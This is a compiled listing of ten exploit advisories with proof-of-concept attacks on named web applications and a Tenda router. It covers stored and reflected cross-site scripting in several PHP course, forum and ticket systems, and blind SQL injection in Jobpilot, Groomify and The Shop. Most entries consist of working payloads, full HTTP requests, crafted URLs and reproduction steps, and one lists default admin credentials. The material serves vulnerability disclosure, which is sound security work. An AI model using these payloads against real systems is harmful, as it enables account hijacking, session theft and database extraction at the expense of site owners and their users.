<pre><code># Exploit Title: Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS)<br /># Date of found: 12/05/2023<br /># Exploit Author: VIVEK CHOUDHARY @sudovivek<br /># Version: V1.0<br /># Tested on: Windows 10<br /># Vendor Homepage: https://phpgurukul.com<br /># Software Link: https://phpgurukul.com/student-study-center-management-system-using-php-and-mysql/<br /># CVE: CVE-2023-33580<br /># CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33580<br /><br />Vulnerability Description -<br /><br /> The Student Study Center Management System V1.0, developed by PHPGurukul, is susceptible to a critical security vulnerability known as Stored Cross-Site Scripting (XSS). This vulnerability enables attackers to inject malicious JavaScript code, which is then stored and executed by the application. The underlying issue lies in the system's failure to adequately sanitize and validate user-provided input within the "Admin Name" field on the Admin Profile page, thereby allowing attackers to inject arbitrary JavaScript code.<br /><br /><br />Steps to Reproduce -<br /><br /> The following steps demonstrate how to exploit the Stored XSS vulnerability in the Student Study Center Management System V1.0:<br /> <br /> 1. Visit the Student Study Center Management System V1.0 application by accessing the URL: http://localhost/student-study-center-MS-PHP/sscms/index.php.<br /><br /> 2. Click on the "Admin" button to navigate to the admin login page.<br /><br /> 3. Login to the Admin account using the default credentials.<br /> - Username: admin<br /> - Password: Test@123<br /><br /> 4. Proceed to the Admin Profile page.<br /><br /> 5. Within the "Admin Name" field, inject the following XSS payload, enclosed in brackets: {"><script>alert("XSS")</script>}.<br /><br /> 6. Click on the "Submit" button.<br /><br /> 7. Refresh the page, and the injected payload will be executed.<br /><br /><br />As a result of successful exploitation, the injected JavaScript code will be stored in the application's database. Subsequently, whenever another user accesses the affected page, the injected code will execute, triggering an alert displaying the text "XSS." This allows the attacker to execute arbitrary code within the user's browser, potentially leading to further attacks or unauthorized actions.<br /><br /></code></pre>
<pre><code># Exploit Title: Stored Cross-Site scripting in the Tenda router via the deviceId parameter in the Parental Control module<br /># Google Dork: None.<br /># Date: Aug-30-2022<br /># Exploit Author: 0x783<br /># Vendor Homepage: https://tendacn.com/default.html<br /># Software Link: https://www.tendacn.com/product/download/AC6.html<br /># Version: AC6 AC1200 Smart Dual-Band WiFi Router - V15.03.06.50_multi<br /># Tested on: Linux 5.15.0-58-generic<br /># CVE : CVE-2022-40010<br />-------------------------------------------------------------------------<br /><br /># 1. Technical Description:<br />Tenda AC6 AC1200 Smart Dual-Band WiFi Router V15.03.06.50 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the deviceId parameter in the parental control section.<br /><br /># Steps to reproduce:<br />1- Navigate to the router webserver usually at "http://192.168.0.1", or whatever the address of the router is.<br />2- Navigate to the parental control section from the side bar.<br />3- Add a new device to the list with any fake MAC address, device name, URL.<br />4- Intercept the request using burpsuite and change the "deviceId" parameter to any javascript code (EX: <script>alert(document.domain")</script>).<br />5- A pop-up with the domain should appear.<br /></code></pre>
<pre><code># Exploit Title: Jobpilot v2.61 - SQL Injection<br /># Date: 2023-06-17<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor: https://codecanyon.net/item/jobpilot-job-portal-laravel-script/37897822<br /># Demo Site: https://jobpilot.templatecookie.com<br /># Tested on: Kali Linux<br /># CVE: N/A<br /><br />----- PoC: SQLi -----<br /><br />Parameter: long (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP<br />BY clause (EXTRACTVALUE)<br /> Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766)<br />AND EXTRACTVALUE(4894,CONCAT(0x5c,0x7170766271,(SELECT<br />(ELT(4894=4894,1))),0x71786b7171)) AND<br />(1440=1440&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL<br />Fire Contract Counties, California, United<br />States&category=&price_min=&price_max=&tag=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766)<br />AND (SELECT 9988 FROM (SELECT(SLEEP(5)))bgbf) AND<br />(1913=1913&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL<br />Fire Contract Counties, California, United<br />States&category=&price_min=&price_max=&tag=<br /><br /></code></pre>
<pre><code># Exploit Title: Groomify v1.0 - SQL Injection<br /># Date: 2023-06-17<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor:<br />https://codecanyon.net/item/groomify-barbershop-salon-spa-booking-and-ecommerce-platform/45808114#<br /># Demo Site: https://script.bugfinder.net/groomify<br /># Tested on: Kali Linux<br /># CVE: N/A<br /><br /><br />### Vulnerable URL ###<br /><br />https://localhost/groomify/blog-search?search=payload<br /><br /><br />### Parameter & Payloads ###<br /><br />Parameter: search (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: search=deneme' AND (SELECT 1642 FROM (SELECT(SLEEP(5)))Xppf)<br />AND 'rszk'='rszk<br /><br /></code></pre>
<pre><code># Exploit Title: The Shop v2.5 - SQL Injection<br /># Date: 2023-06-17<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor: https://codecanyon.net/item/the-shop/34858541<br /># Demo Site: https://shop.activeitzone.com<br /># Tested on: Kali Linux<br /># CVE: N/A<br /><br /><br />### Request ###<br /><br />POST /api/v1/carts/add HTTP/1.1<br />Content-Type: application/json<br />Accept: application/json, text/plain, */*<br />x-requested-with: XMLHttpRequest<br />x-xsrf-token: xjwxipuDENxaHWGfda1nUZbX1R155JZfHD5ab8L4<br />Referer: https://localhost<br />Cookie: XSRF-TOKEN=LBhB7u7sgRN4hB3DB3NSgOBMLE2tGDIYWItEeJGL;<br />the_shop_session=iGQJNeNlvRFGYZvsVowWUMDJ8nRL2xzPRXhT93h7<br />Content-Length: 81<br />Accept-Encoding: gzip,deflate,br<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36<br />Host: localhost<br />Connection: Keep-alive<br /><br />{"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0)","temp_user_id":null}<br /><br /><br />### Parameter & Payloads ###<br /><br />Parameter: JSON qty ((custom) POST)<br /> Type: boolean-based blind<br /> Title: Boolean-based blind - Parameter replace (original value)<br /> Payload: {"variation_id":"119","qty":"(SELECT (CASE WHEN (4420=4420)<br />THEN 'if(now()=sysdate(),sleep(6),0)' ELSE (SELECT 3816 UNION SELECT 4495)<br />END))","temp_user_id":null}<br /><br /> Type: time-based blind<br /> Title: MySQL > 5.0.12 OR time-based blind (heavy query)<br /> Payload: {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0) OR<br />2614=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,<br />INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS<br />C)","temp_user_id":null}<br /><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.codester.com/items/20246/ │<br />│ Vendor : WEBTM Dev │<br />│ Software : BBoard Forum 1.0 │<br />│ Vuln Type: Stored XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Allow Attacker to inject malicious code into website, give ability to steal sensitive │<br />│ information, manipulate data, and launch additional attacks. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />## Stored XSS<br />---------------------------------------------------------<br />POST /viewforum.php?add_topic&f=24 HTTP/2<br /><br />articlename=lulz&question=&answer1=&answer2=&answer3=&answer4=&answer5=&answer6=&file=&editor=[XSS Payload]&btn-login=<br />---------------------------------------------------------<br /><br /><br />## Steps to Reproduce:<br /><br />1. Login in Any Normal User Mode<br />2. Create a new Topic - Click on [+Post New]<br />3. Put Any Title for the Topic<br />4. Put your [XSS Payload] in Comment Editor and Click [Edit]<br />5. XSS Fired<br /><br />6. Anyone will visit your Topic the [XSS Payload] Will Execute on his Browser<br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.codester.com/items/40101/ │<br />│ Vendor : KreativDev │<br />│ Software : WG Ticket 1.0 - Ticket and Support System │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /add-ticket-post<br /><br />POST parameter 'subject' is vulnerable to RXSS<br /><br />-----------------------------271612615641839361601287503567<br />Content-Disposition: form-data; name="subject"<br /><br />lulze1cbq<script>alert(1)</script>nzxns<br />-----------------------------2716126156418393616012875<br /><br />1. Sign UP & Login in any Normal User<br />2. Click on +Open New Request<br />3. In Subject Put Your XSS Payload<br />4. Submit<br />5. XSS Fired on User Browser<br /><br />6. When the Admin Visit the Ticket page From Admin Panel on this Path https://website/admin-tickets<br />7. The XSS Will Fire on his browser<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)<br /># Exploit Author: tmrswrr / Hulya Karabag<br /># Vendor Homepage: https://www.diafancms.com/<br /># Version: 6.0<br /># Tested on: https://demo.diafancms.com<br /><br /><br />Description:<br /><br />1) https://demo.diafancms.com/ Go to main page and write your payload in Search in the goods > Article field:<br />Payload : "><script>alert(document.domain)<%2Fscript><br />2) After will you see alert button : <br />https://demo.diafancms.com/shop/?module=shop&action=search&cat_id=0&a=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pr1=0&pr2=0<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://codecanyon.net/user/kreativdev/portfolio │<br />│ Vendor : KreativDev │<br />│ Software : Coursela - Personal Course Selling Website 1.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /courses<br /><br />GET parameter 'min' is vulnerable to RXSS<br /><br />https://website/courses?type=free&category=software-development&min=4443874%3balert(1)%2f%2f165&max=99<br /><br /><br />Path: /courses<br /><br />GET parameter 'max' is vulnerable to RXSS<br /><br />https://website/courses?type=free&category=software-development&min=44&max=9989896%3balert(1)%2f%2f939<br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://codecanyon.net/user/kreativdev/portfolio │<br />│ Vendor : KreativDev │<br />│ Software : Coursemat - Multi-Tenant Course Selling Website 1.1 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /courses<br /><br />GET parameter 'min' is vulnerable to RXSS<br /><br />https://website/courses?type=premium&category=software-development&min=4615384%3balert(1)%2f%2f359&max=99<br /><br /><br />Path: /courses<br /><br />GET parameter 'max' is vulnerable to RXSS<br /><br />https://website/courses?type=premium&category=software-development&min=46&max=9968240%3balert(1)%2f%2f920<br /><br />[-] Done<br /></code></pre>